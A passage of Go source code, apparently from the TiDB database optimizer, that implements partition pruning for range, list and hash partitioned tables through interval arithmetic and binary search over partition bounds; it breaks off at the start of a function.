func (s *partitionProcessor) prune(ds *DataSource, opt *logicalOptimizeOp) (LogicalPlan, error) {
	pi := ds.tableInfo.GetPartitionInfo()
	if pi == nil {
		// Not a partitioned table: nothing to do.
		return ds, nil
	}
	// Push NOT down so conditions like 'not (a != 1)' become 'a = 1', which
	// the range builder can handle when building ranges from ds.allConds.
	// TODO: there may be a better way to push down Not once for all.
	for i := range ds.allConds {
		ds.allConds[i] = expression.PushDownNot(ds.SCtx(), ds.allConds[i])
	}
	// Dispatch on the partitioning scheme.
	switch pi.Type {
	case model.PartitionTypeRange:
		return s.processRangePartition(ds, pi, opt)
	case model.PartitionTypeHash, model.PartitionTypeKey:
		return s.processHashOrKeyPartition(ds, pi, opt)
	case model.PartitionTypeList:
		return s.processListPartition(ds, pi, opt)
	}
	// Unsupported partition types scan every partition.
	return s.makeUnionAllChildren(ds, pi, fullRange(len(pi.Definitions)), opt)
}
// findByName reports whether partitionName (already lowercased) appears in
// the given partition name list.
func (*partitionProcessor) findByName(partitionNames []model.CIStr, partitionName string) bool {
	return slices.ContainsFunc(partitionNames, func(name model.CIStr) bool {
		return name.L == partitionName
	})
}
// name returns the identifier of this logical optimization rule.
func (*partitionProcessor) name() string {
	return "partition_processor"
}
// lessThanDataInt holds the integer upper bounds ("VALUES LESS THAN") of the
// range partitions. When maxvalue is true, the last entry stands for
// PARTITION ... VALUES LESS THAN (MAXVALUE) and compares above everything.
type lessThanDataInt struct {
	data     []int64
	maxvalue bool
}

// length returns the number of partition bounds.
func (lt *lessThanDataInt) length() int {
	return len(lt.data)
}

// compareUnsigned compares v1 and v2 reinterpreted as uint64 values and
// returns 1, 0 or -1 when v1 is greater than, equal to or less than v2.
func compareUnsigned(v1, v2 int64) int {
	u1, u2 := uint64(v1), uint64(v2)
	if u1 > u2 {
		return 1
	}
	if u1 == u2 {
		return 0
	}
	return -1
}

// compare compares the ith partition bound against v, honoring a MAXVALUE
// last bound and unsigned column semantics when requested.
func (lt *lessThanDataInt) compare(ith int, v int64, unsigned bool) int {
	if ith == len(lt.data)-1 && lt.maxvalue {
		// The MAXVALUE bound is greater than any concrete value.
		return 1
	}
	if unsigned {
		return compareUnsigned(lt.data[ith], v)
	}
	bound := lt.data[ith]
	if bound > v {
		return 1
	}
	if bound == v {
		return 0
	}
	return -1
}
// partitionRange represents [start, end)
type partitionRange struct {
	start int
	end   int
}

// partitionRangeOR represents OR(range1, range2, ...)
type partitionRangeOR []partitionRange

// fullRange returns a partitionRangeOR covering every partition in [0, end).
// The small fixed-size backing array lets a couple of later appends (e.g. in
// union) proceed without reallocating.
func fullRange(end int) partitionRangeOR {
	var reduceAllocation [3]partitionRange
	reduceAllocation[0] = partitionRange{0, end}
	return reduceAllocation[:1]
}

// intersectionRange intersects every range in the receiver with [start, end),
// dropping empty results. NOTE: it reuses the receiver's backing array
// (via or[:0]), so the receiver must not be used after the call.
func (or partitionRangeOR) intersectionRange(start, end int) partitionRangeOR {
	// Let M = intersection, U = union, then
	// a M (b U c) == (a M b) U (a M c)
	ret := or[:0]
	for _, r1 := range or {
		newStart, newEnd := intersectionRange(r1.start, r1.end, start, end)
		// Exclude the empty one.
		if newEnd > newStart {
			ret = append(ret, partitionRange{newStart, newEnd})
		}
	}
	return ret
}

// Len implements sort.Interface.
func (or partitionRangeOR) Len() int {
	return len(or)
}

// Less implements sort.Interface, ordering ranges by their start index.
func (or partitionRangeOR) Less(i, j int) bool {
	return or[i].start < or[j].start
}

// Swap implements sort.Interface.
func (or partitionRangeOR) Swap(i, j int) {
	or[i], or[j] = or[j], or[i]
}

// union appends x and merges overlapping ranges. The result may share storage
// with the receiver.
func (or partitionRangeOR) union(x partitionRangeOR) partitionRangeOR {
	or = append(or, x...)
	return or.simplify()
}

// simplify sorts the ranges by start and merges adjacent/overlapping ones
// in place, returning the reduced slice.
func (or partitionRangeOR) simplify() partitionRangeOR {
	// if the length of the `or` is zero. We should return early.
	if len(or) == 0 {
		return or
	}
	// Make the ranges order by start.
	sort.Sort(or)
	sorted := or
	// Iterate the sorted ranges, merge the adjacent two when their range overlap.
	// For example, [0, 1), [2, 7), [3, 5), ... => [0, 1), [2, 7) ...
	// res aliases sorted's backing array; this is safe because res never grows
	// past the elements already consumed from sorted.
	res := sorted[:1]
	for _, curr := range sorted[1:] {
		last := &res[len(res)-1]
		if curr.start > last.end {
			res = append(res, curr)
		} else {
			// Merge two.
			if curr.end > last.end {
				last.end = curr.end
			}
		}
	}
	return res
}

// intersection returns the set of partitions present in both or and x.
func (or partitionRangeOR) intersection(x partitionRangeOR) partitionRangeOR {
	if or.Len() == 1 {
		return x.intersectionRange(or[0].start, or[0].end)
	}
	if x.Len() == 1 {
		return or.intersectionRange(x[0].start, x[0].end)
	}
	// Rename to x, y where len(x) > len(y)
	var y partitionRangeOR
	if or.Len() > x.Len() {
		x, y = or, x
	} else {
		y = or
	}
	// (a U b) M (c U d) => (x M c) U (x M d), x = (a U b)
	res := make(partitionRangeOR, 0, len(y))
	for _, r := range y {
		// As intersectionRange modify the raw data, we have to make a copy.
		tmp := make(partitionRangeOR, len(x))
		copy(tmp, x)
		tmp = tmp.intersectionRange(r.start, r.end)
		res = append(res, tmp...)
	}
	return res.simplify()
}

// intersectionRange calculate the intersection of [start, end) and [newStart, newEnd)
func intersectionRange(start, end, newStart, newEnd int) (s int, e int) {
	if start > newStart {
		s = start
	} else {
		s = newStart
	}
	if end < newEnd {
		e = end
	} else {
		e = newEnd
	}
	return s, e
}
// pruneRangePartition computes the partition index ranges of a RANGE
// partitioned table that may contain rows matching conds.
func (s *partitionProcessor) pruneRangePartition(ctx sessionctx.Context, pi *model.PartitionInfo, tbl table.PartitionedTable, conds []expression.Expression,
	columns []*expression.Column, names types.NameSlice) (partitionRangeOR, error) {
	partExpr := tbl.(partitionTable).PartitionExpr()
	if len(pi.Columns) > 0 {
		// RANGE COLUMNS partitioning has a dedicated pruner.
		return s.pruneRangeColumnsPartition(ctx, conds, pi, partExpr, columns)
	}
	// Plain RANGE partitioning: try to extract a single column (optionally
	// wrapped by a function) from the partition expression.
	col, fn, mono, err := makePartitionByFnCol(ctx, columns, names, pi.Expr)
	if err != nil {
		return nil, err
	}
	result := fullRange(len(pi.Definitions))
	if col == nil {
		// Without a single partition column we cannot prune at all.
		return result, nil
	}
	pruner := rangePruner{
		lessThan: lessThanDataInt{
			data:     partExpr.ForRangePruning.LessThan,
			maxvalue: partExpr.ForRangePruning.MaxValue,
		},
		col:        col,
		partFn:     fn,
		monotonous: mono,
	}
	return partitionRangeForCNFExpr(ctx, conds, &pruner, result), nil
}
// processRangePartition prunes a RANGE partitioned data source and builds the
// union-all plan over the surviving partitions.
func (s *partitionProcessor) processRangePartition(ds *DataSource, pi *model.PartitionInfo, opt *logicalOptimizeOp) (LogicalPlan, error) {
	pruned, err := s.pruneRangePartition(ds.SCtx(), pi, ds.table.(table.PartitionedTable), ds.allConds, ds.TblCols, ds.names)
	if err != nil {
		return nil, err
	}
	return s.makeUnionAllChildren(ds, pi, pruned, opt)
}
// processListPartition prunes a LIST partitioned data source. When pruning
// yields no candidate partitions, the scan collapses to an empty dual table.
func (s *partitionProcessor) processListPartition(ds *DataSource, pi *model.PartitionInfo, opt *logicalOptimizeOp) (LogicalPlan, error) {
	pruned, err := s.pruneListPartition(ds.SCtx(), ds.table, ds.partitionNames, ds.allConds, ds.TblCols)
	if err != nil {
		return nil, err
	}
	if pruned == nil {
		// No partition can match: replace the scan with an empty dual table.
		dual := LogicalTableDual{RowCount: 0}.Init(ds.SCtx(), ds.SelectBlockOffset())
		dual.schema = ds.Schema()
		appendNoPartitionChildTraceStep(ds, dual, opt)
		return dual, nil
	}
	return s.makeUnionAllChildren(ds, pi, convertToRangeOr(pruned, pi), opt)
}
// makePartitionByFnCol extracts the column and function information in 'partition by ... fn(col)'.
// It returns the single column the expression depends on (nil when no single
// column can be identified, which disables pruning), the wrapping scalar
// function (nil when partitioning directly on the column), and the function's
// monotonicity.
func makePartitionByFnCol(sctx sessionctx.Context, columns []*expression.Column, names types.NameSlice, partitionExpr string) (*expression.Column, *expression.ScalarFunction, monotoneMode, error) {
	monotonous := monotoneModeInvalid
	schema := expression.NewSchema(columns...)
	// Re-parse the partition expression string against the table schema.
	tmp, err := expression.ParseSimpleExprsWithNames(sctx, partitionExpr, schema, names)
	if err != nil {
		return nil, nil, monotonous, err
	}
	partExpr := tmp[0]
	var col *expression.Column
	var fn *expression.ScalarFunction
	switch raw := partExpr.(type) {
	case *expression.ScalarFunction:
		args := raw.GetArgs()
		// Special handle for floor(unix_timestamp(ts)) as partition expression.
		// This pattern is so common for timestamp(3) column as partition expression that it deserve an optimization.
		if raw.FuncName.L == ast.Floor {
			if ut, ok := args[0].(*expression.ScalarFunction); ok && ut.FuncName.L == ast.UnixTimestamp {
				args1 := ut.GetArgs()
				if len(args1) == 1 {
					if c, ok1 := args1[0].(*expression.Column); ok1 {
						return c, raw, monotoneModeNonStrict, nil
					}
				}
			}
		}
		fn = raw
		monotonous = getMonotoneMode(raw.FuncName.L)
		// Check the partitionExpr is in the form: fn(col, ...)
		// There should be only one column argument, and it should be the first parameter.
		if expression.ExtractColumnSet(args...).Len() == 1 {
			if col1, ok := args[0].(*expression.Column); ok {
				col = col1
			}
		}
	case *expression.Column:
		// Partitioning directly on a bare column.
		col = raw
	}
	return col, fn, monotonous, nil
}
// minCmp returns a predicate for sort.Search over the multi-column partition
// bounds: it reports whether partition i's upper bound lies above the scanned
// range's lower bound lowVal, i.e. whether partition i (and thus any later
// partition) may contain rows >= lowVal. Compare errors are signalled through
// *gotError; the caller must then discard the search result.
func minCmp(ctx sessionctx.Context, lowVal []types.Datum, columnsPruner *rangeColumnsPruner, comparer []collate.Collator, lowExclude bool, gotError *bool) func(i int) bool {
	return func(i int) bool {
		for j := range lowVal {
			expr := columnsPruner.lessThan[i][j]
			if expr == nil {
				// MAXVALUE
				return true
			}
			con, ok := (*expr).(*expression.Constant)
			if !ok {
				// Not a constant, pruning not possible, so value is considered less than all partitions
				return true
			}
			// Add Null as point here?
			cmp, err := con.Value.Compare(ctx.GetSessionVars().StmtCtx, &lowVal[j], comparer[j])
			if err != nil {
				*gotError = true
			}
			if cmp > 0 {
				return true
			}
			if cmp < 0 {
				return false
			}
			// cmp == 0: this column ties with the bound; look at the next one.
		}
		// Every given lowVal column ties with the bound prefix.
		if len(lowVal) < len(columnsPruner.lessThan[i]) {
			// Not all columns given
			if lowExclude {
				// prefix cols > const, do not include this partition
				return false
			}
			colIdx := len(lowVal)
			col := columnsPruner.partCols[colIdx]
			conExpr := columnsPruner.lessThan[i][colIdx]
			if conExpr == nil {
				// MAXVALUE
				return true
			}
			// Possible to optimize by getting minvalue of the column type
			// and if lessThan is equal to that
			// we can return false, since the partition definition is
			// LESS THAN (..., colN, minValOfColM, ... ) which cannot match colN == LowVal
			if !mysql.HasNotNullFlag(col.RetType.GetFlag()) {
				// NULL cannot be part of the partitioning expression: VALUES LESS THAN (NULL...)
				// NULL is allowed in the column and will be considered as lower than any other value
				// so this partition needs to be included!
				return true
			}
			if con, ok := (*conExpr).(*expression.Constant); ok && col != nil {
				// When the next bound column sits at the minimum of its type,
				// the bound is effectively '<= prefix', which the tied prefix
				// cannot satisfy, so the partition is excluded.
				switch col.RetType.EvalType() {
				case types.ETInt:
					if mysql.HasUnsignedFlag(col.RetType.GetFlag()) {
						if con.Value.GetUint64() == 0 {
							return false
						}
					} else {
						if con.Value.GetInt64() == types.IntergerSignedLowerBound(col.GetType().GetType()) {
							return false
						}
					}
				case types.ETDatetime:
					if con.Value.GetMysqlTime().IsZero() {
						return false
					}
				case types.ETString:
					if len(con.Value.GetString()) == 0 {
						return false
					}
				}
			}
			// Also if not a constant, pruning not possible, so value is considered less than all partitions
			return true
		}
		// Full-length tie: the bound equals lowVal, so rows >= lowVal live in
		// a later partition (bounds are exclusive: LESS THAN).
		return false
	}
}
// maxCmp returns a predicate for sort.Search over the multi-column partition
// bounds: it reports whether partition i's upper bound lies strictly above
// the scanned range's upper bound hiVal, i.e. whether partition i is the
// first partition that can hold values beyond the range. Compare errors are
// signalled through *gotError; the caller must then discard the result.
func maxCmp(ctx sessionctx.Context, hiVal []types.Datum, columnsPruner *rangeColumnsPruner, comparer []collate.Collator, hiExclude bool, gotError *bool) func(i int) bool {
	return func(i int) bool {
		for j := range hiVal {
			expr := columnsPruner.lessThan[i][j]
			if expr == nil {
				// MAXVALUE
				return true
			}
			con, ok := (*expr).(*expression.Constant)
			if !ok {
				// Not a constant, include every partition, i.e. value is not less than any partition
				return false
			}
			// Add Null as point here?
			cmp, err := con.Value.Compare(ctx.GetSessionVars().StmtCtx, &hiVal[j], comparer[j])
			if err != nil {
				*gotError = true
				// error pushed, we will still use the cmp value
			}
			if cmp > 0 {
				return true
			}
			if cmp < 0 {
				return false
			}
			// cmp == 0: this column ties with the bound; look at the next one.
		}
		// All hiVal == columnsPruner.lessThan
		if len(hiVal) < len(columnsPruner.lessThan[i]) {
			// Not all columns given
			if columnsPruner.lessThan[i][len(hiVal)] == nil {
				// MAXVALUE
				return true
			}
		}
		// if point is included, then false, due to LESS THAN
		return hiExclude
	}
}
// multiColumnRangeColumnsPruner prunes a multi-column RANGE COLUMNS
// partitioned table: it detaches index-style ranges over the partition
// columns from exprs and, for each range, binary-searches the first and last
// partition whose bounds can intersect it, then intersects the collected
// partition ranges with result. On any failure it falls back to all
// partitions, which is always safe (over-inclusive).
func multiColumnRangeColumnsPruner(sctx sessionctx.Context, exprs []expression.Expression,
	columnsPruner *rangeColumnsPruner, result partitionRangeOR) partitionRangeOR {
	lens := make([]int, 0, len(columnsPruner.partCols))
	for i := range columnsPruner.partCols {
		lens = append(lens, columnsPruner.partCols[i].RetType.GetFlen())
	}
	res, err := ranger.DetachCondAndBuildRangeForIndex(sctx, exprs, columnsPruner.partCols, lens, sctx.GetSessionVars().RangeMaxSize)
	if err != nil {
		return fullRange(len(columnsPruner.lessThan))
	}
	if len(res.Ranges) == 0 {
		if len(res.AccessConds) == 0 && len(res.RemainedConds) == 0 {
			// Impossible conditions, like: a > 2 AND a < 1
			return partitionRangeOR{}
		}
		// Could not extract any valid range, use all partitions
		return fullRange(len(columnsPruner.lessThan))
	}
	rangeOr := make([]partitionRange, 0, len(res.Ranges))
	comparer := make([]collate.Collator, 0, len(columnsPruner.partCols))
	for i := range columnsPruner.partCols {
		comparer = append(comparer, collate.GetCollator(columnsPruner.partCols[i].RetType.GetCollate()))
	}
	gotError := false
	// Create a sort.Search where the compare loops over ColumnValues
	// Loop over the different ranges and extend/include all the partitions found
	for idx := range res.Ranges {
		minComparer := minCmp(sctx, res.Ranges[idx].LowVal, columnsPruner, comparer, res.Ranges[idx].LowExclude, &gotError)
		maxComparer := maxCmp(sctx, res.Ranges[idx].HighVal, columnsPruner, comparer, res.Ranges[idx].HighExclude, &gotError)
		if gotError {
			// the compare function returned error, use all partitions.
			return fullRange(len(columnsPruner.lessThan))
		}
		// Can optimize if the range start is types.KindNull/types.MinNotNull
		// or range end is types.KindMaxValue
		start := sort.Search(len(columnsPruner.lessThan), minComparer)
		end := sort.Search(len(columnsPruner.lessThan), maxComparer)
		// end is the first partition whose bound exceeds the range's high end;
		// include it, since that partition can still contain the high value.
		if end < len(columnsPruner.lessThan) {
			end++
		}
		rangeOr = append(rangeOr, partitionRange{start, end})
	}
	return result.intersection(rangeOr).simplify()
}
// partitionRangeForCNFExpr intersects into result the partition ranges
// implied by each conjunct of exprs.
func partitionRangeForCNFExpr(sctx sessionctx.Context, exprs []expression.Expression,
	pruner partitionRangePruner, result partitionRangeOR) partitionRangeOR {
	// TODO: When the ranger/detacher handles varchar_col_general_ci cmp constant bin collation
	// remove the check for single column RANGE COLUMNS and remove the single column implementation
	if colPruner, ok := pruner.(*rangeColumnsPruner); ok && len(colPruner.partCols) > 1 {
		// Multi-column RANGE COLUMNS takes the range-detaching path.
		return multiColumnRangeColumnsPruner(sctx, exprs, colPruner, result)
	}
	for _, cond := range exprs {
		result = partitionRangeForExpr(sctx, cond, pruner, result)
	}
	return result
}
// partitionRangeForExpr calculates the partitions the expression may match
// and intersects them into result. AND, OR and IN receive dedicated
// handling; any other expression is treated as an atomic predicate.
func partitionRangeForExpr(sctx sessionctx.Context, expr expression.Expression,
	pruner partitionRangePruner, result partitionRangeOR) partitionRangeOR {
	if sf, ok := expr.(*expression.ScalarFunction); ok {
		switch sf.FuncName.L {
		case ast.LogicAnd:
			return partitionRangeForCNFExpr(sctx, sf.GetArgs(), pruner, result)
		case ast.LogicOr:
			orArgs := sf.GetArgs()
			return result.intersection(partitionRangeForOrExpr(sctx, orArgs[0], orArgs[1], pruner))
		case ast.In:
			switch p := pruner.(type) {
			case *rangePruner:
				return result.intersection(partitionRangeForInExpr(sctx, sf.GetArgs(), p))
			case *rangeColumnsPruner:
				return result.intersection(partitionRangeColumnForInExpr(sctx, sf.GetArgs(), p))
			}
			return result
		}
	}
	// Atomic predicate: ask the pruner for the matching partition interval.
	start, end, ok := pruner.partitionRangeForExpr(sctx, expr)
	if !ok {
		// Can't prune, keep the whole range.
		return result
	}
	return result.intersectionRange(start, end)
}
// partitionRangePruner computes the partition interval that may satisfy a
// single predicate under a given partitioning scheme.
type partitionRangePruner interface {
	// partitionRangeForExpr returns [start, end) and whether pruning succeeded.
	partitionRangeForExpr(sessionctx.Context, expression.Expression) (start, end int, succ bool)
	// fullRange returns the range covering every partition.
	fullRange() partitionRangeOR
}

var _ partitionRangePruner = &rangePruner{}

// rangePruner is used by 'partition by range'.
type rangePruner struct {
	// lessThan holds the integer upper bounds of the partitions.
	lessThan lessThanDataInt
	// col is the single column the partition expression depends on.
	col *expression.Column
	// partFn is the function wrapping col; nil when partitioning directly on
	// the column.
	partFn *expression.ScalarFunction
	// If partFn is not nil, monotonous indicates partFn is monotonous or not.
	monotonous monotoneMode
}
// partitionRangeForExpr returns the partition interval [start, end) that may
// satisfy expr; ok is false when the expression cannot be used for pruning.
func (p *rangePruner) partitionRangeForExpr(sctx sessionctx.Context, expr expression.Expression) (start int, end int, ok bool) {
	if con, isConst := expr.(*expression.Constant); isConst {
		// A constant-false predicate matches no partition at all.
		if b, err := con.Value.ToBool(sctx.GetSessionVars().StmtCtx); err == nil && b == 0 {
			return 0, 0, true
		}
	}
	pruneData, ok := p.extractDataForPrune(sctx, expr)
	if !ok {
		return 0, 0, false
	}
	isUnsigned := mysql.HasUnsignedFlag(p.col.RetType.GetFlag())
	start, end = pruneUseBinarySearch(p.lessThan, pruneData, isUnsigned)
	return start, end, true
}
// fullRange returns the range covering every partition of the table.
func (p *rangePruner) fullRange() partitionRangeOR {
	return fullRange(p.lessThan.length())
}
// partitionRangeForOrExpr calculates the partitions for or(expr1, expr2) as
// the union of the partitions each disjunct may touch.
func partitionRangeForOrExpr(sctx sessionctx.Context, expr1, expr2 expression.Expression,
	pruner partitionRangePruner) partitionRangeOR {
	lhs := partitionRangeForExpr(sctx, expr1, pruner, pruner.fullRange())
	rhs := partitionRangeForExpr(sctx, expr2, pruner, pruner.fullRange())
	return lhs.union(rhs)
}
// partitionRangeColumnForInExpr prunes a RANGE COLUMNS table for 'col IN
// (...)' by rewriting each list element into an equality predicate and
// pruning them one by one. Any non-constant or unsupported element disables
// pruning entirely.
func partitionRangeColumnForInExpr(sctx sessionctx.Context, args []expression.Expression,
	pruner *rangeColumnsPruner) partitionRangeOR {
	col, ok := args[0].(*expression.Column)
	if !ok || col.ID != pruner.partCols[0].ID {
		return pruner.fullRange()
	}
	var result partitionRangeOR
	for _, arg := range args[1:] {
		constExpr, ok := arg.(*expression.Constant)
		if !ok {
			return pruner.fullRange()
		}
		switch constExpr.Value.Kind() {
		case types.KindNull:
			// NULL sorts into the first partition.
			result = append(result, partitionRange{0, 1})
			continue
		case types.KindInt64, types.KindUint64, types.KindMysqlTime, types.KindString: // for safety, only support string,int and datetime now
		default:
			return pruner.fullRange()
		}
		// convert all elements to EQ-exprs and prune them one by one
		eq, err := expression.NewFunction(sctx, ast.EQ, types.NewFieldType(types.KindInt64), []expression.Expression{col, arg}...)
		if err != nil {
			return pruner.fullRange()
		}
		start, end, ok := pruner.partitionRangeForExpr(sctx, eq)
		if !ok {
			return pruner.fullRange()
		}
		result = append(result, partitionRange{start, end})
	}
	return result.simplify()
}
// partitionRangeForInExpr prunes a RANGE table for 'col IN (...)' by locating
// the partition of each constant element; a non-constant element disables
// pruning entirely.
func partitionRangeForInExpr(sctx sessionctx.Context, args []expression.Expression,
	pruner *rangePruner) partitionRangeOR {
	col, ok := args[0].(*expression.Column)
	if !ok || col.ID != pruner.col.ID {
		return pruner.fullRange()
	}
	var result partitionRangeOR
	isUnsigned := mysql.HasUnsignedFlag(col.RetType.GetFlag())
	for _, arg := range args[1:] {
		constExpr, ok := arg.(*expression.Constant)
		if !ok {
			return pruner.fullRange()
		}
		if constExpr.Value.Kind() == types.KindNull {
			// NULL sorts into the first partition.
			result = append(result, partitionRange{0, 1})
			continue
		}
		var (
			val int64
			err error
		)
		if pruner.partFn != nil {
			// Partition key is fn(col): evaluate fn(const) instead.
			val, _, err = replaceColumnWithConst(pruner.partFn, constExpr).EvalInt(sctx, chunk.Row{})
		} else {
			val, err = constExpr.Value.ToInt64(sctx.GetSessionVars().StmtCtx)
		}
		if err != nil {
			return pruner.fullRange()
		}
		start, end := pruneUseBinarySearch(pruner.lessThan, dataForPrune{op: ast.EQ, c: val}, isUnsigned)
		result = append(result, partitionRange{start, end})
	}
	return result.simplify()
}
// monotoneMode classifies how a partition function preserves ordering.
type monotoneMode int

const (
	// monotoneModeInvalid means the function is not known to be monotone.
	monotoneModeInvalid monotoneMode = iota
	// monotoneModeStrict: x > y implies f(x) > f(y).
	monotoneModeStrict
	// monotoneModeNonStrict: x > y implies f(x) >= f(y).
	monotoneModeNonStrict
)

// monotoneIncFuncs are those functions that are monotone increasing.
// For any x y, if x > y => f(x) > f(y), function f is strict monotone .
// For any x y, if x > y => f(x) >= f(y), function f is non-strict monotone.
var monotoneIncFuncs = map[string]monotoneMode{
	ast.Year:          monotoneModeNonStrict,
	ast.ToDays:        monotoneModeNonStrict,
	ast.UnixTimestamp: monotoneModeStrict,
	// Only when the function form is fn(column, const)
	ast.Plus:  monotoneModeStrict,
	ast.Minus: monotoneModeStrict,
}
// getMonotoneMode returns how the named function behaves with respect to
// monotonicity; unknown functions are reported as not monotone.
func getMonotoneMode(fnName string) monotoneMode {
	if mode, ok := monotoneIncFuncs[fnName]; ok {
		return mode
	}
	return monotoneModeInvalid
}
// dataForPrune represents a normalized predicate 'f(x) op c' extracted for
// pruning, where op is one of =, <, >, <=, >= or isnull.
type dataForPrune struct {
	op string
	c  int64
}
// extractDataForPrune extracts data from the expression for pruning.
// The expression should have this form: 'f(x) op const', otherwise it can't be pruned.
func (p *rangePruner) extractDataForPrune(sctx sessionctx.Context, expr expression.Expression) (dataForPrune, bool) {
	var ret dataForPrune
	op, ok := expr.(*expression.ScalarFunction)
	if !ok {
		return ret, false
	}
	// Only simple comparisons and isnull(col) are prunable.
	switch op.FuncName.L {
	case ast.EQ, ast.LT, ast.GT, ast.LE, ast.GE:
		ret.op = op.FuncName.L
	case ast.IsNull:
		// isnull(col)
		if arg0, ok := op.GetArgs()[0].(*expression.Column); ok && arg0.ID == p.col.ID {
			ret.op = ast.IsNull
			return ret, true
		}
		return ret, false
	default:
		return ret, false
	}
	// Identify the 'col op const' / 'const op col' shape; in the latter case
	// the operator is mirrored so the rest of the code sees 'col op const'.
	var col *expression.Column
	var con *expression.Constant
	if arg0, ok := op.GetArgs()[0].(*expression.Column); ok && arg0.ID == p.col.ID {
		if arg1, ok := op.GetArgs()[1].(*expression.Constant); ok {
			col, con = arg0, arg1
		}
	} else if arg0, ok := op.GetArgs()[1].(*expression.Column); ok && arg0.ID == p.col.ID {
		if arg1, ok := op.GetArgs()[0].(*expression.Constant); ok {
			ret.op = opposite(ret.op)
			col, con = arg0, arg1
		}
	}
	if col == nil || con == nil {
		return ret, false
	}
	// Current expression is 'col op const'
	var constExpr expression.Expression
	if p.partFn != nil {
		// If the partition function is not monotone, only EQ condition can be pruning.
		if p.monotonous == monotoneModeInvalid && ret.op != ast.EQ {
			return ret, false
		}
		// If the partition expression is fn(col), change constExpr to fn(constExpr).
		constExpr = replaceColumnWithConst(p.partFn, con)
		// When the partFn is not strict monotonous, we need to relax the condition < to <=, > to >=.
		// For example, the following case doesn't hold:
		// col < '2020-02-11 17:34:11' => to_days(col) < to_days(2020-02-11 17:34:11)
		// The correct transform should be:
		// col < '2020-02-11 17:34:11' => to_days(col) <= to_days(2020-02-11 17:34:11)
		if p.monotonous == monotoneModeNonStrict {
			ret.op = relaxOP(ret.op)
		}
	} else {
		// If the partition expression is col, use constExpr.
		constExpr = con
	}
	// If the partition expression is related with more than one columns such as 'a + b' or 'a * b' or something else,
	// the constExpr may not a really constant when coming here.
	// Suppose the partition expression is 'a + b' and we have a condition 'a = 2',
	// the constExpr is '2 + b' after the replacement which we can't evaluate.
	if !constExpr.ConstItem(sctx.GetSessionVars().StmtCtx) {
		return ret, false
	}
	c, isNull, err := constExpr.EvalInt(sctx, chunk.Row{})
	if err == nil && !isNull {
		ret.c = c
		return ret, true
	}
	return ret, false
}
// replaceColumnWithConst change fn(col) to fn(const)
// NOTE(review): this rewrites partFn's argument slice in place and returns
// the same *ScalarFunction, so the pruner's stored expression is mutated on
// every call. That works for the sequential evaluate-immediately usage in
// this file, but would be unsafe if the expression were shared concurrently
// — confirm before reusing elsewhere.
func replaceColumnWithConst(partFn *expression.ScalarFunction, con *expression.Constant) *expression.ScalarFunction {
	args := partFn.GetArgs()
	// The partition function may be floor(unix_timestamp(ts)) instead of a simple fn(col).
	if partFn.FuncName.L == ast.Floor {
		if ut, ok := args[0].(*expression.ScalarFunction); ok && ut.FuncName.L == ast.UnixTimestamp {
			args = ut.GetArgs()
			args[0] = con
			return partFn
		}
	}
	// No 'copy on write' for the expression here, this is a dangerous operation.
	args[0] = con
	return partFn
}
// opposite mirrors a comparison operator for swapped operands: > becomes <,
// >= becomes <=, and vice versa; = stays =. Any other operator indicates a
// caller bug and panics.
func opposite(op string) string {
	switch op {
	case ast.EQ:
		return ast.EQ
	case ast.LT:
		return ast.GT
	case ast.GT:
		return ast.LT
	case ast.LE:
		return ast.GE
	case ast.GE:
		return ast.LE
	}
	// Fix: the original message lacked a separator, producing output like
	// "invalid input parameterge".
	panic("invalid input parameter: " + op)
}
// relaxOP relaxes a strict comparison to its inclusive form (< to <=, > to
// >=); other operators pass through unchanged. This is required when a
// non-strict monotone function f is applied to both sides, e.g.:
// datetime < 2020-02-11 16:18:42 => to_days(datetime) <= to_days(2020-02-11)
// (the strict form to_days(datetime) < to_days(2020-02-11) would be wrong).
func relaxOP(op string) string {
	if op == ast.LT {
		return ast.LE
	}
	if op == ast.GT {
		return ast.GE
	}
	return op
}
// pruneUseBinarySearch returns the start and end of which partitions will match.
// If no match (i.e. value > last partition) the start partition will be the number of partition, not the first partition!
func pruneUseBinarySearch(lessThan lessThanDataInt, data dataForPrune, unsigned bool) (start int, end int) {
	length := lessThan.length()
	switch data.op {
	case ast.EQ:
		// col = 66, lessThan = [4 7 11 14 17] => [5, 5)
		// col = 14, lessThan = [4 7 11 14 17] => [4, 5)
		// col = 10, lessThan = [4 7 11 14 17] => [2, 3)
		// col = 3, lessThan = [4 7 11 14 17] => [0, 1)
		pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) > 0 })
		start, end = pos, pos+1
	case ast.LT:
		// col < 66, lessThan = [4 7 11 14 17] => [0, 5)
		// col < 14, lessThan = [4 7 11 14 17] => [0, 4)
		// col < 10, lessThan = [4 7 11 14 17] => [0, 3)
		// col < 3, lessThan = [4 7 11 14 17] => [0, 1)
		pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) >= 0 })
		start, end = 0, pos+1
	case ast.GE:
		// col >= 66, lessThan = [4 7 11 14 17] => [5, 5)
		// col >= 14, lessThan = [4 7 11 14 17] => [4, 5)
		// col >= 10, lessThan = [4 7 11 14 17] => [2, 5)
		// col >= 3, lessThan = [4 7 11 14 17] => [0, 5)
		pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) > 0 })
		start, end = pos, length
	case ast.GT:
		// col > 66, lessThan = [4 7 11 14 17] => [5, 5)
		// col > 14, lessThan = [4 7 11 14 17] => [4, 5)
		// col > 10, lessThan = [4 7 11 14 17] => [3, 5)
		// col > 3, lessThan = [4 7 11 14 17] => [1, 5)
		// col > 2, lessThan = [4 7 11 14 17] => [0, 5)
		// NOTE(review): data.c+1 wraps when data.c is the maximum int64/uint64
		// value; the search then starts from the first partition, which is
		// over-inclusive but still correct — confirm whether tighter handling
		// of this edge is wanted.
		pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c+1, unsigned) > 0 })
		start, end = pos, length
	case ast.LE:
		// col <= 66, lessThan = [4 7 11 14 17] => [0, 6)
		// col <= 14, lessThan = [4 7 11 14 17] => [0, 5)
		// col <= 10, lessThan = [4 7 11 14 17] => [0, 3)
		// col <= 3, lessThan = [4 7 11 14 17] => [0, 1)
		pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) > 0 })
		start, end = 0, pos+1
	case ast.IsNull:
		// NULL values are placed in the first partition.
		start, end = 0, 1
	default:
		start, end = 0, length
	}
	// Clamp: several branches compute end as pos+1, which may exceed length.
	if end > length {
		end = length
	}
	return start, end
}
// resolveAccessPaths recomputes the possible access paths of ds from its
// hints and filters them by the isolation-read engine setting.
func (*partitionProcessor) resolveAccessPaths(ds *DataSource) error {
